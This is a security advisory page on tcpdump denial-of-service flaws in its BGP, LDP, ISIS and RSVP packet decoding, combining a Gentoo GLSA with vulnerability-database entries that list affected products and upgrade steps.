  1  net-analyzer/tcpdump     < 3.8.3-r2                   >= 3.8.3-r2

Description
===========

TCPDump improperly handles and decodes ISIS, BGP, LDP (CAN-2005-1279)
and RSVP (CAN-2005-1280) packets. TCPDump might loop endlessly after
receiving malformed packets.

Impact
======

A malicious remote attacker can exploit the decoding issues for a
Denial of Service attack by sending specially crafted packets, possibly
causing TCPDump to loop endlessly.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All TCPDump users should upgrade to the latest available version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=net-analyzer/tcpdump-3.8.3-r2"

References
==========

  [ 1 ] CAN-2005-1279
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1279
  [ 2 ] CAN-2005-1280
        http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2005-1280

Availability
============

This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200505-06.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
=======

Copyright 2005 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.0
    

- 漏洞信息

15863
tcpdump BGP RT_ROUTING_INFO Malformed Packet DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

tcpdump contains a flaw that may allow a remote denial of service. The issue is triggered when handling Border Gateway Protocol (BGP) packets. By sending a malformed BGP packet, a remote attacker could cause the application to enter an infinite loop resulting in a loss of availability.

- 时间线

2005-04-26 Unknow
2005-04-26 Unknow

- 解决方案

Upgrade to version CVS-Current or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

tcpdump LDP Decoding Routines Denial Of Service Vulnerability
Failure to Handle Exceptional Conditions 13389
Yes No
2005-04-26 12:00:00 2009-06-23 07:19:00
Discovery of this issue is credited to Vade 79 <v9@fakehalo.us>.

- 受影响的程序版本

Turbolinux Turbolinux Server 10.0
Turbolinux Appliance Server 1.0 Workgroup Edition
Turbolinux Appliance Server 1.0 Hosting Edition
Trustix Secure Linux 2.2
Trustix Secure Linux 2.1
Trustix Secure Enterprise Linux 2.0
SuSE SUSE Linux Enterprise Server 8
+ Linux kernel 2.4.21
+ Linux kernel 2.4.19
SGI ProPack 3.0
SCO Unixware 7.1.4
SCO Unixware 7.1.3 up
SCO Unixware 7.1.3
SCO Open Server 6.0
S.u.S.E. SuSE Linux Standard Server 8.0
S.u.S.E. SuSE Linux School Server for i386
S.u.S.E. SUSE LINUX Retail Solution 8.0
S.u.S.E. SuSE Linux Openexchange Server 4.0
S.u.S.E. Open-Enterprise-Server 9.0
S.u.S.E. Novell Linux Desktop 9.0
S.u.S.E. Linux Professional 9.3 x86_64
S.u.S.E. Linux Professional 9.3
S.u.S.E. Linux Professional 9.2 x86_64
S.u.S.E. Linux Professional 9.2
S.u.S.E. Linux Professional 9.1 x86_64
S.u.S.E. Linux Professional 9.1
S.u.S.E. Linux Professional 9.0 x86_64
S.u.S.E. Linux Professional 9.0
S.u.S.E. Linux Professional 8.2
S.u.S.E. Linux Personal 9.3 x86_64
S.u.S.E. Linux Personal 9.3
S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1 x86_64
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux Enterprise Server 9
S.u.S.E. Linux Desktop 1.0
RedHat Linux 9.0 i386
RedHat Enterprise Linux WS 4
RedHat Enterprise Linux ES 4
RedHat Desktop 4.0
Red Hat Fedora Core3
Red Hat Fedora Core2
Red Hat Fedora Core1
Red Hat Enterprise Linux AS 4
NetBSD NetBSD Current
NetBSD NetBSD 4.0
Mandriva Linux Mandrake 10.2 x86_64
Mandriva Linux Mandrake 10.2
Mandriva Linux Mandrake 10.1 x86_64
Mandriva Linux Mandrake 10.1
Mandriva Linux Mandrake 10.0 AMD64
MandrakeSoft Corporate Server 3.0 x86_64
MandrakeSoft Corporate Server 3.0
LBL tcpdump 3.8.3
+ Debian Linux 3.1 sparc
+ Debian Linux 3.1 s/390
+ Debian Linux 3.1 ppc
+ Debian Linux 3.1 mipsel
+ Debian Linux 3.1 mips
+ Debian Linux 3.1 m68k
+ Debian Linux 3.1 ia-64
+ Debian Linux 3.1 ia-32
+ Debian Linux 3.1 hppa
+ Debian Linux 3.1 arm
+ Debian Linux 3.1 amd64
+ Debian Linux 3.1 alpha
+ Debian Linux 3.1
+ Turbolinux Appliance Server 1.0 Workgroup Edition
+ Turbolinux Appliance Server 1.0 Hosting Edition
+ Turbolinux Appliance Server Hosting Edition 1.0
+ Turbolinux Appliance Server Workgroup Edition 1.0
+ Turbolinux Home
+ Turbolinux Turbolinux 10 F...
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Ubuntu Ubuntu Linux 5.0 4 powerpc
+ Ubuntu Ubuntu Linux 5.0 4 i386
+ Ubuntu Ubuntu Linux 5.0 4 amd64
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
LBL tcpdump 3.8.2
LBL tcpdump 3.8.1
+ Mandriva Linux Mandrake 10.0
LBL tcpdump 3.7.2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.2 amd64
+ Mandriva Linux Mandrake 9.2
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Turbolinux Turbolinux Advanced Server 6.0
+ Turbolinux Turbolinux Desktop 10.0
+ Turbolinux Turbolinux Server 8.0
+ Turbolinux Turbolinux Server 7.0
+ Turbolinux Turbolinux Server 6.5
+ Turbolinux Turbolinux Server 6.1
+ Turbolinux Turbolinux Workstation 8.0
+ Turbolinux Turbolinux Workstation 7.0
+ Turbolinux Turbolinux Workstation 6.1
+ Turbolinux Turbolinux Workstation 6.0
LBL tcpdump 3.7.1
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ Gentoo Linux 1.4 _rc2
+ Gentoo Linux 1.4 _rc1
+ S.u.S.E. Linux 8.1
LBL tcpdump 3.7
+ FreeBSD FreeBSD 4.6 -RELEASE
+ FreeBSD FreeBSD 4.6
+ FreeBSD FreeBSD 4.5 -STABLE
+ FreeBSD FreeBSD 4.5 -RELEASE
+ FreeBSD FreeBSD 4.5
+ FreeBSD FreeBSD 4.4 -STABLE
+ FreeBSD FreeBSD 4.4 -RELENG
+ FreeBSD FreeBSD 4.4
+ FreeBSD FreeBSD 4.3 -STABLE
+ FreeBSD FreeBSD 4.3 -RELENG
+ FreeBSD FreeBSD 4.3 -RELEASE
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2 -STABLE
+ FreeBSD FreeBSD 4.2 -RELEASE
+ FreeBSD FreeBSD 4.2
LBL tcpdump 3.6.3
LBL tcpdump 3.6.2
+ Caldera OpenLinux Server 3.1.1
+ Caldera OpenLinux Server 3.1
+ Caldera OpenLinux Workstation 3.1.1
+ Caldera OpenLinux Workstation 3.1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux 5.1
+ Conectiva Linux 5.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ Debian Linux 3.0
+ FreeBSD FreeBSD 4.3
+ FreeBSD FreeBSD 4.2
+ FreeBSD FreeBSD 4.1.1
+ FreeBSD FreeBSD 4.1
+ FreeBSD FreeBSD 4.0
+ HP Secure OS software for Linux 1.0
+ MandrakeSoft Corporate Server 1.0.1
+ MandrakeSoft Single Network Firewall 7.2
+ Mandriva Linux Mandrake 8.2
+ Mandriva Linux Mandrake 8.1
+ Mandriva Linux Mandrake 8.0
+ Mandriva Linux Mandrake 7.2
+ Mandriva Linux Mandrake 7.1
+ RedHat Linux 7.2 ia64
+ RedHat Linux 7.2 i386
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
+ S.u.S.E. Linux 8.0
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
LBL tcpdump 3.5.2
LBL tcpdump 3.5 alpha
LBL tcpdump 3.5
LBL tcpdump 3.4 a6
+ Debian Linux 2.2 sparc
+ Debian Linux 2.2 powerpc
+ Debian Linux 2.2 IA-32
+ Debian Linux 2.2 arm
+ Debian Linux 2.2 alpha
+ Debian Linux 2.2 68k
+ Debian Linux 2.2
+ S.u.S.E. Firewall Adminhost VPN
+ S.u.S.E. Linux 7.2
+ S.u.S.E. Linux 7.1
+ S.u.S.E. Linux 7.0
+ S.u.S.E. Linux 6.4
+ S.u.S.E. Linux Admin-CD for Firewall
+ S.u.S.E. Linux Connectivity Server
+ S.u.S.E. Linux Database Server 0
+ S.u.S.E. Linux Enterprise Server for S/390
+ S.u.S.E. Linux Live-CD for Firewall
+ S.u.S.E. SuSE eMail Server III
+ SuSE SUSE Linux Enterprise Server 7
LBL tcpdump 3.4
+ RedHat Linux 7.1 ia64
+ RedHat Linux 7.1 i386
+ RedHat Linux 7.1 alpha
+ RedHat Linux 7.0 i386
+ RedHat Linux 7.0 alpha
+ RedHat Linux 6.2 sparc
+ RedHat Linux 6.2 i386
+ RedHat Linux 6.2 alpha
IPCop IPCop 1.4.5
IPCop IPCop 1.4.4
IPCop IPCop 1.4.2
IPCop IPCop 1.4.1
Gentoo Linux
FreeBSD FreeBSD 5.4 -RELENG
FreeBSD FreeBSD 5.4 -RELEASE
FreeBSD FreeBSD 5.4 -PRERELEASE
FreeBSD FreeBSD 5.3 -STABLE
FreeBSD FreeBSD 5.3 -RELENG
FreeBSD FreeBSD 5.3 -RELEASE
FreeBSD FreeBSD 5.3
FreeBSD FreeBSD 5.2.1 -RELEASE
FreeBSD FreeBSD 5.2 -RELENG
FreeBSD FreeBSD 5.2 -RELEASE
FreeBSD FreeBSD 5.2
FreeBSD FreeBSD 5.1 -RELENG
FreeBSD FreeBSD 5.1 -RELEASE/Alpha
FreeBSD FreeBSD 5.1 -RELEASE-p5
FreeBSD FreeBSD 5.1 -RELEASE
FreeBSD FreeBSD 5.1
FreeBSD FreeBSD 5.0 -RELENG
FreeBSD FreeBSD 5.0 -RELEASE-p14
FreeBSD FreeBSD 5.0 alpha
FreeBSD FreeBSD 5.0
F5 BigIP 4.6.5
F5 BigIP 4.6.3
F5 BigIP 4.6.2
F5 BigIP 4.6
F5 BigIP 4.5.12
F5 BigIP 4.5.11
F5 BigIP 4.5.10
F5 BigIP 4.5.9
F5 BigIP 4.5.6
F5 BigIP 4.5
F5 BigIP 4.4
F5 BigIP 4.3
F5 BigIP 4.2
F5 BigIP 4.0
F5 3-DNS 4.6.3
F5 3-DNS 4.6.2
F5 3-DNS 4.6
F5 3-DNS 4.5.12
F5 3-DNS 4.5.11
F5 3-DNS 4.5
F5 3-DNS 4.4
F5 3-DNS 4.3
F5 3-DNS 4.2
Avaya S8710 R2.0.1
Avaya S8710 R2.0.0
Avaya S8700 R2.0.1
Avaya S8700 R2.0.0
Avaya S8500 R2.0.1
Avaya S8500 R2.0.0
Avaya S8300 R2.0.1
Avaya S8300 R2.0.0
Avaya Modular Messaging (MSS) 2.0
Avaya Modular Messaging (MSS) 1.1
Avaya MN100
Avaya Intuity LX
Avaya Converged Communications Server 2.0
F5 BigIP 4.7
F5 BigIP 4.5.13
F5 3-DNS 4.7
F5 3-DNS 4.5.13

- 不受影响的程序版本

F5 BigIP 4.7
F5 BigIP 4.5.13
F5 3-DNS 4.7
F5 3-DNS 4.5.13

- 漏洞讨论

The 'tcpdump' utility is prone to a vulnerability that may allow a remote attacker to cause a denial-of-service condition in the software. The issue occurs because of the way tcpdump decodes Label Distribution Protocol (LDP) datagrams. A remote attacker may send malformed LDP datagrams to cause the software to enter an infinite loop and hang.

This issue affects tcpdump 3.8.3 and earlier.

- 漏洞利用

The following exploits are available:

- 解决方案

Reportedly, the vendor has addressed this vulnerability in alpha 3.9.x / CVS releases of tcpdump, but this is not confirmed.

Please see the referenced vendor advisories for more information.


Turbolinux Appliance Server 1.0 Workgroup Edition

IPCop IPCop 1.4.1

IPCop IPCop 1.4.4

Mandriva Linux Mandrake 10.0 AMD64

Turbolinux Turbolinux Server 10.0

Mandriva Linux Mandrake 10.1 x86_64

Mandriva Linux Mandrake 10.1

MandrakeSoft Corporate Server 3.0

LBL tcpdump 3.7.2

LBL tcpdump 3.8.2

LBL tcpdump 3.8.3

FreeBSD FreeBSD 5.3

FreeBSD FreeBSD 5.3 -STABLE

FreeBSD FreeBSD 5.4 -RELENG

SCO Open Server 6.0

SCO Unixware 7.1.4

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站